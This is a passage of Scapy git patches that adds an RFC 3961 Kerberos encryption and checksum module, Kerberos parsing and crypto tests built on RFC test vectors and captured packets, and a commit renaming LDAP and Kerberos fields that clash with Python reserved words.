hmac = HMAC.new(kc.key, text, cls.enc.hashmod).digest() + return hmac[: cls.macsize] + + @classmethod + def verify(cls, key, keyusage, text, cksum): + if key.etype != cls.enc.etype: + raise ValueError("Wrong key type for checksum") + super(_SimplifiedChecksum, cls).verify(key, keyusage, text, cksum) + + +class _SHA1AES128(_SimplifiedChecksum): + macsize = 12 + enc = _AES128CTS + + +class _SHA1AES256(_SimplifiedChecksum): + macsize = 12 + enc = _AES256CTS + + +class _SHA1DES3(_SimplifiedChecksum): + macsize = 20 + enc = _DES3CBC + + +class _HMACMD5(_ChecksumProfile): + @classmethod + def checksum(cls, key, keyusage, text): + ksign = HMAC.new(key.key, b"signaturekey\0", MD5).digest() + md5hash = MD5.new(_RC4.usage_str(keyusage) + text).digest() + return HMAC.new(ksign, md5hash, MD5).digest() + + @classmethod + def verify(cls, key, keyusage, text, cksum): + if key.etype != EncryptionType.RC4: + raise ValueError("Wrong key type for checksum") + super(_HMACMD5, cls).verify(key, keyusage, text, cksum) + + +_enctypes = { + EncryptionType.DES_MD5: _DESMD5, + EncryptionType.DES_MD4: _DESMD4, + EncryptionType.DES3: _DES3CBC, + EncryptionType.AES128: _AES128CTS, + EncryptionType.AES256: _AES256CTS, + EncryptionType.RC4: _RC4, +} + + +_checksums = { + ChecksumType.SHA1_DES3: _SHA1DES3, + ChecksumType.SHA1_AES128: _SHA1AES128, + ChecksumType.SHA1_AES256: _SHA1AES256, + ChecksumType.HMAC_MD5: _HMACMD5, + 0xFFFFFF76: _HMACMD5, +} + + +class Key(object): + def __init__(self, etype, cksumtype=None, key=None): + self.eptype = etype + try: + self.ep = _enctypes[etype] + except ValueError: + raise ValueError("Unknown etype '%s'" % etype) + self.cksumtype = cksumtype + if cksumtype is not None: + try: + self.cp = _checksums[etype] + except ValueError: + raise ValueError("Unknown etype '%s'" % etype) + if key is not None and len(key) != self.ep.keysize: + raise ValueError( + "Wrong key length. Got %s. Expected %s" % (len(key), self.ep.keysize) + ) + self.key = key + + def __repr__(self): + return "" % ( + self.eptype, + " (%s octets)" % len(self.key) if self.key is not None else "", + ) + + def encrypt(self, keyusage, plaintext, confounder=None): + return self.ep.encrypt(self, keyusage, bytes(plaintext), bytes(confounder)) + + def decrypt(self, keyusage, ciphertext): + # Throw InvalidChecksum on checksum failure. Throw ValueError on + # invalid key enctype or malformed ciphertext. + return self.ep.decrypt(self, keyusage, ciphertext) + + def prf(self, string): + return self.ep.prf(self, string) + + def make_checksum(self, keyusage, text): + if self.cksumtype is None: + raise ValueError("checksumtype not specified !") + return self.cp.checksum(self, keyusage, text) + + def verify_checksum(self, keyusage, text, cksum): + # Throw InvalidChecksum exception on checksum failure. Throw + # ValueError on invalid cksumtype, invalid key enctype, or + # malformed checksum. + if self.cksumtype is None: + raise ValueError("checksumtype not specified !") + self.cp.verify(self, keyusage, text, cksum) + + @classmethod + def random_to_key(cls, etype, seed): + try: + ep = _enctypes[etype] + except ValueError: + raise ValueError("Unknown etype '%s'" % etype) + if len(seed) != ep.seedsize: + raise ValueError("Wrong crypto seed length") + return ep.random_to_key(seed) + + @classmethod + def string_to_key(cls, etype, string, salt, params=None): + try: + ep = _enctypes[etype] + except ValueError: + raise ValueError("Unknown etype '%s'" % etype) + return ep.string_to_key(string, salt, params) + + +def KRB_FX_CF2(key1, key2, pepper1, pepper2): + """ + KRB-FX-CF2 RFC6113 + """ + + def prfplus(key, pepper): + # Produce l bytes of output using the RFC 6113 PRF+ function. + out = b"" + count = 1 + while len(out) < key.ep.seedsize: + out += key.prf(chb(count) + pepper) + count += 1 + return out[: key.ep.seedsize] + + return _xorbytes( + bytearray(prfplus(key1, pepper1)), bytearray(prfplus(key2, pepper2)) + ) diff --git a/scapy/libs/structures.py b/scapy/libs/structures.py index c4bc6655499..3f2339cd413 100644 --- a/scapy/libs/structures.py +++ b/scapy/libs/structures.py @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-only -# # This file is part of Scapy +# This file is part of Scapy # See https://scapy.net/ for more information """ diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 2c8a6dab6f3..4044b8eda96 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -23,7 +23,14 @@ assert isinstance(pkt.root, KRB_ERROR) assert pkt.root.cname.nameString[0] == b"LOCALDC$" assert pkt.root.realm == b"SAMBA.EXAMPLE.COM" assert pkt.root.eText == b"NEEDED_PREAUTH" -assert len(pkt.root.eData.val) == 384 +assert len(pkt.root.eData.seq) == 4 +assert pkt.root.eData.seq[0].padataType == 0x88 +assert pkt.root.eData.seq[1].padataType == 0x13 +assert pkt.root.eData.seq[3].padataType == 0x85 +assert pkt.root.eData.seq[3].padataValue == b"MIT" + +etype_info2 = pkt.root.eData.seq[1] +assert etype_info2.padataValue.seq[0].salt == b'SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com' = AS-REP @@ -45,9 +52,13 @@ pkt = IP(b'E\x00\x06V\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x1d\x00\x00\x00\x assert isinstance(pkt.root, KRB_TGS_REQ) assert pkt.root.padata[0].padataType == 0x1 -assert len(pkt.root.padata[0].padataValue.val) == 1204 +assert len(pkt.root.padata[0].padataValue) == 1204 +assert pkt.root.padata[0].padataType == 0x1 +assert isinstance(pkt.root.padata[0].padataValue, KRB_AP_REQ) +assert pkt.root.padata[1].padataType == 0x88 +assert len(pkt.root.padata[1].padataValue) == 212 assert pkt.root.padata[1].padataType == 0x88 -assert len(pkt.root.padata[1].padataValue.val) == 212 +assert pkt.root.padata[1].padataValue.armoredData.encFastReq.etype == 0x12 assert pkt.root.reqBody.kdcOptions.val == '01000000100000010000000000000000' assert pkt.root.reqBody.sname.nameString == [b'ldap', b'localdc.samba.example.com'] assert pkt.root.reqBody.till.val == '20150130011709Z' @@ -63,3 +74,114 @@ assert pkt.root.ticket.sname.nameString == [b'ldap', b'localdc.samba.example.com assert len(pkt.root.ticket.encPart.cipher.val) == 891 assert pkt.root.encPart.etype == 0x12 ++ Advanced Kerberos tests + += Use ancient RFC1964 with InitialContext + +pkt = GSSAPI_BLOB(b'`\x82\n\xc2\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\n\xb60\x82\n\xb2\xa0\r0\x0b\x06\t*\x86H\x82\xf7\x12\x01\x02\x02\xa2\x82\n\x9f\x04\x82\n\x9b`\x82\n\x97\x06\t*\x86H\x86\xf7\x12\x01\x02\x02\x01\x00n\x82\n\x860\x82\n\x82\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0e\xa2\x07\x03\x05\x00 \x00\x00\x00\xa3\x82\x03\xf9a\x82\x03\xf50\x82\x03\xf1\xa0\x03\x02\x01\x05\xa1\x13\x1b\x11SAMBA.EXAMPLE.COM\xa2\x1a0\x18\xa0\x03\x02\x01\x01\xa1\x110\x0f\x1b\x04cifs\x1b\x07localdc\xa3\x82\x03\xb70\x82\x03\xb3\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x01\xa2\x82\x03\xa5\x04\x82\x03\xa1\x8eA^\xd1\xa6!\x0f\x82\xb9\xbe\x82\xd0\xe8\x8c\xd7\x1bs\xb7\xb4&h\xec\xd6]\x0f\xdc\xc30n\x9f\xc2\xbb\xf03\x93\x027\x88_\xd7\x85I\x81\xf1\xba7\xcf \xa4\xf4\xa3\xc5C\x1d\xe8z\x1f\xb7\x97\xb1\x1e\x93\xcc\x1e\xc2\'\x94\xee\xf3v\xael\x95\x9d5x\xde\xcf\xad\x16\x1c=\x0eDbb\x9e\xbaE\xfc\x9d\xddnu\x19\x1c\xa4x\xf0#\xc8\x1fTI:\xfb\x94\xd7#,\x9f\xf8\xca\t\xf5\xdd\xcf\xd4\'qLy\x85\xac#\xcb\xde\xe1\xc1\x02+\xf8\xf4{.\xe6\xd7`)\x9d[\xfd\xb8\xc3+\xcaF\t\xa1\x97\xd4\x8c\xe3.\xa4\x80\xd1v2\xf8\xff\xb7\x89y\x98\x13&\x94\xe4\x95\\\x12l\xd8j)\xa7\xa4^\xed\xa9\xee\x92\xaf\x99a\x18\x08\x96M\x8d\xe2\xed\xf4J\xf9\xa8\xb9L0b6\xfc\xa6\x82\x84\xa5`Z\\\xe3\x8e\xaaW\xffj\x94\x05\x88(D$\x84\x11\xe3f1\xfb@\x05g\x00\xad\xf9\x92\x9a\x92^/\xe5\xd4J\xbd\x1bH\x98\xe4#\xb2\x87S^p\xb30\xe6hdK\x1fpp\xde\xf3\xf8\x1b1C\x9c\x9f^e\xfa\x1e\r%\xf6@\xe1=#\xd6\xbf\x82\x8c\'\xca\xcf\xf1\xda\xaa\xdch\x7f\x99\x8e\xa8{4_\xb6\xc1\x1a\xb2\xd0\x16Pfb"\x0b\xde\x02\xb8)=\xbbF\xdfg\xd3\xa4CGb\xfd\xe3\xc0\xff\x96\x8a)\xd9\xd4d\x15\xaa\x01\xa7\xa6\x8f\x81\xf3\xedl\xeb\x8a@\x86\xf6dv\x17\xc4\xda\x14a\xbb5\x80\x08\xa4BPR\xe3);\xb7I\xd3\x90\xaa\xb5\x02\xcb ?\xd2\xb5T\x9d\xd0Ho`\xb0r\xd9R\x9fI\x05\xf9b\xd9\xa6\xa8\xae2Q\xed\x1f/@\x1b=bC\xc8\x1d\xbb1\t\xc7\xabBNK\xf4\x0f0Q\x13\x8e\'\xf9\x91\n\x90\xa4\x97\x81S\xda7u\x92<\xa7@\xa0LO\xb7\xa5\x88\x0b\xa8\xd8p\xbbs\x97f\x17\x16\x87\xbe\xff\x84\xcf\xbf\xba=n\xd0w\xeb\x99x\x03\n\xb5\'\x0ewQ\x90;\xed~}}\x1a\xaf\xe5\x9d\xc4r\xe8\xa6\x97\x07AYl\xec\x8b\xc8\xf5I#\x0f\x04#\xf1\xf9\xec\xdf=\xd7\xc25\tC\xa2\x00\x0cr\xa7N\xfa\x1d\x18\x0es\x05\xef\x11\x84\xc2}\xee\xecKW\xc3\xaeo\x8eS\xa3\xa2n\xb3\xd3\xf1\xb0\xfc\xd8\xe8\xd7jp\xf7$\x11\xd2\xafZ\x83\';*\x87\xa6\xc2\n\xd9:\x8cy9d8\x1a\xf7B\n\nr\xa9M\xcf\xf5?\xe1\xa0\xdca\xd3\xc9\xdc\xc6\x04KyQ\x7f)g;\xc8s?0\xab\xf7\xd7\xd7\x85\xdd1]\xd2\x12\xb5\x1c\x87\x05/\xf4\xe4\x8ci\xe3+\xdeH"\xc2\xe7Z\x17\xaa \xd2\xbaKr\xcc\xd0\xa9\x1d\xe2u\xab\xcc\xd9\xc0\x05\xc5\xf2\t\xf5\xb1M\xa4\x84\x1fS\xfe\xb1\x18r\x81\xba\xc9\xfe\x8f\x01\x8c\x12\xd2\xa6Jy\n\x98\xe9\xd1\xfa\x89\x9c\x84\xf8\xd5\x7f3\x92\'\xed\xa9\xc3\xc1\xcd\xcd\xb9\x19\xec\xb2\x08\xa2\xd0\xc1@\x80\xf1\xc1\x1b(\\\xd3\x17\x04\xf8\xbf\x1a\xb4>.\xcbzP>R\xe9\x84V\x04\x92\xf3\r\x9a\xd2\x99\xf0q>K\\\xb5f\x8e\x9c\xc2\xb3\x1f\xebL\x19~\xda^\x1dY\n\x9d\xd11B;n\xcc\xd3\x1e\x1d\xe0\xe2o\x14\xd8_\xaf\'f\r\xe1 \xfaD\xaa\xad7\xac\x81\xd2\xfd\xf1-D\xba\xa8*\x07J\xbb4\x1b\x19ny\x81\x113\x0e]\xfa|T\x91ayS\xe8\xf6y\x9d\x8b1\xf5\xbb\\\xfb8JD\x17Fq\xd4\x8aF\x16\x9ed\x1cJ\x864p\x94k\xe2\xdd\xdc\x15\xb7\x0f*\xae\xa3@\xc2\x92\xcd\x17>|\xc8\xb7\xd7\x1ay \x8b\xbdZ\xef3*~S\x81D\x12}$\x0c\xce\xa7`\xcam\x9a4q\xdfK\x0eE\xbe\xbf,\xfe\x8a\xe6\xd0Q\x03\xe2\x19\xefx\xb6`%\xcb/\xfa&\\\x15\xc8\xa3\x83V\x18N\xad\xce|6r\x01tW\xa4\x82\x06n0\x82\x06j\xa0\x03\x02\x01\x12\xa2\x82\x06a\x04\x82\x06]\xbe\x88N^mh#\x18\xc2\xf0\x8e\xda\xe5E\xab\xe8\x811\xd2\x0e\xd2q\x96\xf3\xb6\r\xa2s\xcf\xe70s\x0eF\x1b\x01~\x9ev\xcc\xb0h`5\x11\x8d\xb4f}\xad\xc9\xbeGG\xe4\x1f,\x08\x8f\xde}\xad\x0f\xee\x00\n`j\xb2\x9fy]>\xd3)w)8\xc4\x88\xf3]2ea\xce\xf5.R1\xe5G\x87\xeb\xa8\x0f4\xcf\x13\xe7\x1d\xcd\x16\x00\xe8\xf5\xc4_1\x95\xb6\x16\xa0b*\xf6\x8e\xd2\xd5\x19s\x1b\xce\x86\xd4)R\xa9\x13i"\xe7}\xda\x8d_\x961\xb3\x8b=\xd3R\xa9\xb8c,\xb3\xb7#\xdbt*\x04\x15\xa5\xa8f\x80m\xe8m\x1b\xb2\xe9\x1f\x1f\\\x1a\xbb\x90x{&@\xc3v\xa5#>\xd2\xb7\xd1y\x1f\xf6&wz\x88\xe2\xdd\xdb\xc0\xbfP\xec\xbf\x9a\xff\xf0"\xdf\x9e\xdd\x87\xb4\x06)2\x12\xd7\xad\x99\xf0\x98\xfdB6<\x8d\x1e\xf5\x0c0\x9e+\x19\xa4\x91E\xcet5\xbbz@M\xd8\x18\t\xdd\xaa\x16V\x87Ii\x0f\xe5)P\x0e\xd32\xbfK\x06j\x14\xcc\x8e&TZ\xfa\x89\x87\xe6\xd0\xe5\xe5[`\x97\x13|0s\x1c\x841Y\xbcT\x19\xa1\x8b\xef\x16k\xde\xf6\x0e\x9fPA^\xfe\xa3S\xd9-\xab\xf2{Y#b(\xcb\x13\x1b\xae\xb0h\x91wy\xfd\xff\x01\x13\x92O\xcc<\xf1\x88\xb7\x07\xc5\xe8,\xa3\x8et\xe7\x186FP\xe9?\x862\x881\xd3E\x91\xea\xf0\xa3I\xba\xc1^\xa1\x1b\xce\xeftZn\xb1m\x1ah\xfa\xe8\xf2z\xb8\x11\xa19Z\x13Y{1\x8a\xa4\xc5LRl(\x91\xf7\xcaI7\x13\xf6\xe4\x1c\xb1\xf6!\xe9;/U~\r\x17\xcd5}J\xcd\x18\xe0\xae\x1a\xca\xdb\x99\x02\x13\xbc\x93\xff\xfe\x82\x90&|\xf4\xf2fI\xbb\xfc\x81m\xc0\x94\xcb\x9a\x0f{\xd3\xa2<\x86g N2\xd8\x8f]NA\x0c?\x8d\x80 S\r\xde\xa6\x87\xd4"W\x9c\xa1\x18p\xbf\xc5e(\x06Bc\x1c\x8e<\xf8D\xb8\xd8\x8b\x88_Q\nh\xb6xW\xd7\xc1l\x08t\xce\xc2\n\x06\xb1\x1b\xe1\x16x\xe6\xb9Q \xba\xdfa\x97\xa9\x9c\xf1\xf3N\x97w\xf8\xfd:!\x93\xa6\xc7\xfc\xcd\xf3\x12\x14\xe5\x8dB\x9d\xe2uY{3\xc8bukA\xfa\x95\xa5\xa3\xcc(-\xf6\\\x9f\x14OD\xef\x0f\x8c\xde\xd0B\'<\xd36hT\xbd\xa0\'\x89\x1f\'\x15`\xbb[\xf8Zx\xdc\xcdx0)\xc2\x8dD-\xa9m\xe3\xd7\x91w\x10\x8aD\xd37+\x8b\xf7\xa7\xa2\x8d{\x0c\xd8\x80\xe1<)lg\xb9\xbfr\x95^)^\x0e\xe5*\xbfGk!5/$01z\xf7\xcf\x86\x1aF\xf2V\x12\xa8w\xad\x070\xf3\x10\x86\xd6\x19\r\xdd\x88\xbe\xc4\xef\xbb\xd2\t,\xa2\xcd9\xbd\x11\x03\xed\xc9X\x98_\x00\xf5\xfa\t<\x9d\xfco/\x84\xca:\x1e\xc6A\xb0\x1f\x8d\x07\x18\x11\\WC\r\x7f\\\xa0\xea\'\xcc\x96\xc7\xd8\x9a\xb4-\r\x88\xc8\x12\x1f\x8b`\n#\x9a\x92\xa9\x86\x85z\x0ctB\xff:\xaf\xbc\xd4F\xcf$R\x8a\x81\xbd\x84\xe03F\x95\xa0\xbb\xdc\xd9\x7f\xc9\x91/\xc3\x9c~m\x9d\xbb\xfd\x8a\x80\xa8\x81\xb1VC\xf5y\x13N\xa6\x1dq\x1bn\xa0\x83\xeaQ\xe4-\xe3m\x99\xcf\xe6\xb2n\xe7\x0e\xea*\x01\xb5\xdb\xf5P\x03\x96\x82\x91\xe9\xa7\x9bm\x9c\x98\xe3j\x85UG\xd9\x0f\xb5\xb47\xd18d\x9f~VL\xa6\x98\xf2.\xf3\x821\xc8\x03\\fP\'\xee\x85\xbf\xdbd\xc1\x023\xf9\xb5D\xda\xe6Y\x0b[\x86\x9b\xbd\x96z\xe67\x05\xba\x1f\xfd\x1f\xb2F\xf2P\xbd<\xd7\xbdUj\xb1@O\xa2}\x02C\xc4\x01eu\x7f%b\xb4\xfc\xe1D\x02\x8f\xbfj\xd7~E\xd5^h\xc8\xc3\xf9\xb3\x1e\xf0\xbb\x02\xfb\x8c\xc4\xc2\xa8&xn)\x08^\xc0H\xbc\x19\xb7-a?N=?\x93\x97\xb2Q\xe0\x04`T\x1bS2\xd8\xbc3d\xef?\x1e\xab\xc2\x82\xcc\xa4\xe7\xd9\xe6\xe2\xd3\xe9Q\x83\x11\xf4\xfb\x82\xa4y\x176\xaf\xf4_\xbf\xa196\xb4\x05B\xc7\xb3\xd2\x0c\x8c\x18\x95\xe1\xba\x97=Y|\x19k\x0c\xf2\xb3\x0fAV\xd1\x04\xeffX\xcd*?\x03S\x92\x0b\x85\x00\x99x+sh\x07\xd2zl\xbbUS\xf0A\x1aS\xa1\x1fFRf\xc6\x9b\x8dV\x85\x14kE\xae\xef\x05\x18Nx\t\xc8K\xd2\xfd1\xc2\xb9H\xde:L\xd5h%c\xa5,$b\xf9\xa2\xce\xa6\xe5X\x11\xb9\x12\xe7\xd6\x1d\x1f\x03\x8e\xba\xc8>=\x8f\xca\xdf\x80U\xce\x16\xb50w\xaes\xa9)\xdd\x863f\xad2\xc6t`\xc1>\x9d;7o\xa6\xef\x08}1S\xb3\xf7\xdf\xa6\xa0@\xae=\xa3\xb8H\x89\x0f\xdd\x7f\xed\xa4\x19\xf5\x94\xc91\xb9B\xca"\x93\xc1\x05&\xbd\x8c\x82\xdf;C\xcb\xd4R\xc8>\xde\xd8j@\x81\xb6\xa7r\xe9\xb5\xb2\xe0\r:\x8d+\x89\xe1\xee\xf5Aj\x8d\xfb\xa0\xd8?\x06\x10D\xcc\xa6?@\'\xc06^\xfa^s\xe6\r\x8d\x1e\x9cv\xd6\xce\xda)Q\x7f\x83\xba\xe0\xc7R\x82\xe9\xbf\xb8\x88\x12\xe7\x13\xc4\xc4/\x8f\x1d\xde\x197\xe8\x9aFe:\xc33\x02\xbc\x85q7\xbc\xde#\x1e\xdb\x7f\xf2#\xda\x80IT,\xc5\xe7\xe7)\x1a\xb0\x0e-\xbe\xf8\x14\xee\xa1\x82\x1c\x99j\xe4}\x84\xb4\xcc\x10\x84\xean\xc8\x9f\xe7=a2\xa7\x84\xa1\x87\x00n\xd7\x9b\xd2\xe8c\xc7\x9f\xca\xbd=\xdch*\x1b\x0f\xceH\x81\xf7\xdc\x1a\x93A\xdbJ\xe3\x936\xe3\xff\xfb!\'\xe3\x1b"\xff\xc6\x1b4\x98\xde\xc1%A3\x16\x7f&\xafM\xdfX\xfb\\\x1d\x91Vp\x19\xcd\xd8\xe3$\x13J\x9c\x89\xbc~\x07O\xac?\x0c\xa6\x80yZ\xef0\xef}\x89BA\xe9k\xfa\xf9P\x97\xe5\x14\xd4+/_\xa6\xba\xf9\x04Ph\xe1\x1a\xb5=\xd6nq\xd8\x13L\x03\xd5\x19V\xd9e&\xdfJ\x99\x90\xca\xc7\x84\xfb\x08H\xa6Y\xc0T[\x87\xbeok\xb4\xeb\xca\xdb\x9d\xcf|\xbdn\x9f\xde\xb10\xecnWc\x80\x18\x07\xfb\x1eYb{Q\x0e\x0f\xfc\xcbE\xcct\xfe\xd7\x8a\xb6\x1a\x17\xba\xeb\xfdG\xdbz\xa8\xe89\xb5[\x0e\x83kO\xdc|\x14\x92\xdc3\nc\x05~e1') + +assert isinstance(pkt.innerContextToken.token.mechToken.value.root, KRB_InitialContextToken) +assert pkt.innerContextToken.token.mechToken.value.root.innerContextToken.TOK_ID == b'\x01\x00' +krb = pkt.innerContextToken.token.mechToken.value.root.innerContextToken.payload +assert isinstance(krb, Kerberos) +assert krb.root.ticket.sname.nameString == [b"cifs", b"localdc"] + ++ Crypto tests +~ disabled + +# disabled because pycryptodome but they work ! + += Test vectors for KRB-FX-CF2 + +# https://datatracker.ietf.org/doc/html/rfc6113.html#appendix-A + +from scapy.libs.rfc3961 import Key, EncryptionType, KRB_FX_CF2 + +def test_krb_fx_cf2(etype): + k1 = Key.string_to_key(etype, b"key1", b"key1") + k2 = Key.string_to_key(etype, b"key2", b"key2") + return bytes_hex(KRB_FX_CF2(k1, k2, b"a", b"b")) + +assert test_krb_fx_cf2(EncryptionType.AES128) == b"97df97e4b798b29eb31ed7280287a92a" +assert test_krb_fx_cf2(EncryptionType.AES256) == b"4d6ca4e629785c1f01baf55e2e548566b9617ae3a96868c337cb93b5e72b1c7b" +assert test_krb_fx_cf2(EncryptionType.RC4) == b'24d7f6b6bae4e5c00d2082c5ebab3672' + += Test vectors for _n_fold + +from scapy.libs.rfc3961 import _n_fold + +# https://datatracker.ietf.org/doc/html/rfc3961.html#appendix-A.1 + +assert bytes_hex(_n_fold(b"012345", 8)) == b"be072631276b1955" +assert bytes_hex(_n_fold(b"password", 7)) == b"78a07b6caf85fa" +assert bytes_hex(_n_fold(b"Rough Consensus, and Running Code", 8)) == b"bb6ed30870b7f0e0" +assert bytes_hex(_n_fold(b"password", 21)) == b"59e4a8ca7c0385c3c37b3f6d2000247cb6e6bd5b3e" +assert bytes_hex(_n_fold(b"MASSACHVSETTS INSTITVTE OF TECHNOLOGY", 24)) == b"db3b0d8f0b061e603282b308a50841229ad798fab9540c1b" +assert bytes_hex(_n_fold(b"Q", 21)) == b"518a54a215a8452a518a54a215a8452a518a54a215" +assert bytes_hex(_n_fold(b"ba", 21)) ==b"fb25d531ae8974499f52fd92ea9857c4ba24cf297e" + + += Test vectors for mit_des_string_to_key + +# https://datatracker.ietf.org/doc/html/rfc3961.html#appendix-A.2 + +from scapy.libs.rfc3961 import Key, EncryptionType + +def _mit_des_string_to_key(text, salt): + k = Key.string_to_key(EncryptionType.DES_MD5, text, salt) + return bytes_hex(k.key) + +assert _mit_des_string_to_key(b"password", b"ATHENA.MIT.EDUraeburn") == b"cbc22fae235298e3" +assert _mit_des_string_to_key(b"potatoe", b"WHITEHOUSE.GOVdanny") == b"df3d32a74fd92a01" +assert _mit_des_string_to_key((u"\U0001d11e").encode(), b"EXAMPLE.COMpianist") == b"4ffb26bab0cd9413" +assert _mit_des_string_to_key((u"\xdf").encode(), (u"ATHENA.MIT.EDUJuri\u0161i\u0107").encode()) == b"62c81a5232b5e69d" +assert _mit_des_string_to_key(b"11119999", b"AAAAAAAA") == b"984054d0f1a73e31" +assert _mit_des_string_to_key(b"NNNN6666", b"FFFFAAAA") == b"c4bf6b25adf7a4f8" + += Test vectors for DES3 + +# https://datatracker.ietf.org/doc/html/rfc3961.html#appendix-A.4 + +def _des3_string_to_key(text, salt): + k = Key.string_to_key(EncryptionType.DES3, text, salt) + return bytes_hex(k.key) + +assert _des3_string_to_key(b"password", b"ATHENA.MIT.EDUraeburn") == b"850bb51358548cd05e86768c313e3bfef7511937dcf72c3e" +assert _des3_string_to_key(b"potatoe", b"WHITEHOUSE.GOVdanny") == b"dfcd233dd0a43204ea6dc437fb15e061b02979c1f74f377a" +assert _des3_string_to_key(b"penny", b"EXAMPLE.COMbuckaroo") == b"6d2fcdf2d6fbbc3ddcadb5da5710a23489b0d3b69d5d9d4a" +assert _des3_string_to_key((u"\xdf").encode(), (u"ATHENA.MIT.EDUJuri\u0161i\u0107").encode()) == b"16d5a40e1ce3bacb61b9dce00470324c831973a7b952feb0" +assert _des3_string_to_key((u"\U0001d11e").encode(), b"EXAMPLE.COMpianist") == b"85763726585dbc1cce6ec43e1f751f07f1c4cbb098f40b19" + + += Test vectors for AES + +from scapy.libs.rfc3961 import Key, EncryptionType + +# https://datatracker.ietf.org/doc/html/rfc3962#appendix-B + +# Iteration count = 1200 +# Pass phrase = "password" +# Salt = "ATHENA.MIT.EDUraeburn" + +k = Key.string_to_key(EncryptionType.AES128, b"password", b"ATHENA.MIT.EDUraeburn", struct.pack(">L", 1200)) +assert bytes_hex(k.key) == b"4c01cd46d632d01e6dbe230a01ed642a" + +# Iteration count = 1200 +# Pass phrase = (65 characters) +# "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" +# Salt = "pass phrase exceeds block size" + +k = Key.string_to_key(EncryptionType.AES256, b"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", b"pass phrase exceeds block size", struct.pack(">L", 1200)) +assert bytes_hex(k.key) == b"d78c5c9cb872a8c9dad4697f0bb5b2d21496c82beb2caeda2112fceea057401b" + += Decrypt PA-ENC-TIMESTAMP + +from scapy.libs.rfc3961 import Key, EncryptionType + +pkt = Ether(b"RT\x00iX\x13RT\x00!l+\x08\x00E\x00\x01]\xa7\x18@\x00\x80\x06\xdc\x83\xc0\xa8z\x9c\xc0\xa8z\x11\xc2\t\x00XT\xf6\xab#\x92\xc2[\xd6P\x18 \x14\xb6\xe0\x00\x00\x00\x00\x011j\x82\x01-0\x82\x01)\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\n\xa3c0a0L\xa1\x03\x02\x01\x02\xa2E\x04C0A\xa0\x03\x02\x01\x12\xa2:\x048HHM\xec\xb0\x1c\x9bb\xa1\xca\xbf\xbc?-\x1e\xd8Z\xa5\xe0\x93\xba\x83X\xa8\xce\xa3MC\x93\xaf\x93\xbf!\x1e'O\xa5\x8e\x81Hx\xdb\x9f\rz(\xd9Ns'f\r\xb4\xf3pK0\x11\xa1\x04\x02\x02\x00\x80\xa2\t\x04\x070\x05\xa0\x03\x01\x01\xff\xa4\x81\xb70\x81\xb4\xa0\x07\x03\x05\x00@\x81\x00\x10\xa1\x120\x10\xa0\x03\x02\x01\x01\xa1\t0\x07\x1b\x05win1$\xa2\x0e\x1b\x0cDOMAIN.LOCAL\xa3!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cDOMAIN.LOCAL\xa5\x11\x18\x0f20370913024805Z\xa6\x11\x18\x0f20370913024805Z\xa7\x06\x02\x04p\x1c\xc5\xd1\xa8\x150\x13\x02\x01\x12\x02\x01\x11\x02\x01\x17\x02\x01\x18\x02\x02\xffy\x02\x01\x03\xa9\x1d0\x1b0\x19\xa0\x03\x02\x01\x14\xa1\x12\x04\x10WIN1 ") +enc = pkt[Kerberos].root.padata[0].padataValue +k = Key(enc.etype.val, key=hex_bytes("7fada4e566ae4fb270e2800a23ae87127a819d42e69b5e22de0ddc63da80096d")) +ts = enc.decrypt(k) + +assert ts.patimestamp == "20220715171847Z" +ts.pausec == 0x9a4db From 3040f6d705176731494a7bcf76b820f077716729 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 19 Jul 2022 21:52:13 +0200 Subject: [PATCH 0852/1632] Do not use reserved names as attributes (Python 3.11) (#3686) --- scapy/layers/kerberos.py | 2 +- scapy/layers/ldap.py | 10 +++++----- scapy/layers/smb.py | 2 +- test/scapy/layers/ldap.uts | 2 +- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 263ea354360..85d7a585beb 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -793,7 +793,7 @@ class KRB_KDC_REQ_BODY(ASN1_Packet): ASN1F_optional( ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xA3), ), - ASN1F_optional(KerberosTime("from", None, explicit_tag=0xA4)), + ASN1F_optional(KerberosTime("from_", None, explicit_tag=0xA4)), KerberosTime("till", GeneralizedTime(), explicit_tag=0xA5), ASN1F_optional(KerberosTime("rtime", GeneralizedTime(), explicit_tag=0xA6)), UInt32("nonce", 0, explicit_tag=0xA7), diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 40c542c0c52..f9f297d1065 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -247,12 +247,12 @@ class LDAP_SubstringFilter(ASN1_Packet): class LDAP_FilterAnd(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SET_OF("and", [], _LDAP_Filter) + ASN1_root = ASN1F_SET_OF("and_", [], _LDAP_Filter) class LDAP_FilterOr(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SET_OF("or", [], _LDAP_Filter) + ASN1_root = ASN1F_SET_OF("or_", [], _LDAP_Filter) class LDAP_FilterPresent(ASN1_Packet): @@ -264,11 +264,11 @@ class LDAP_Filter(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_CHOICE( "filter", LDAP_FilterPresent(), - ASN1F_PACKET("and", None, LDAP_FilterAnd, + ASN1F_PACKET("and_", None, LDAP_FilterAnd, implicit_tag=0x80), - ASN1F_PACKET("or", None, LDAP_FilterOr, + ASN1F_PACKET("or_", None, LDAP_FilterOr, implicit_tag=0x81), - ASN1F_PACKET("not", None, + ASN1F_PACKET("not_", None, _LDAP_Filter, implicit_tag=0x82), 